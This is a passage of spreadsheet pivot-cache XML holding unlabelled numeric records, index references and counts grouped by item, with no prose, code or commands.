    <x v="1487"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="12"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="2"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1488"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="3"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="13"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="23"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="2"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="23"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1489"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="9"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="45"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="11"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1490"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1491"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1492"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="10"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1493"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="184"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1494"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1495"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1496"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="14"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="12"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1498"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1499"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1500"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="17"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="1497"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="14"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1501"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="2"/>
    <x v="1502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="727"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="727"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1503"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="1504"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1505"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="17"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="22"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1506"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1507"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
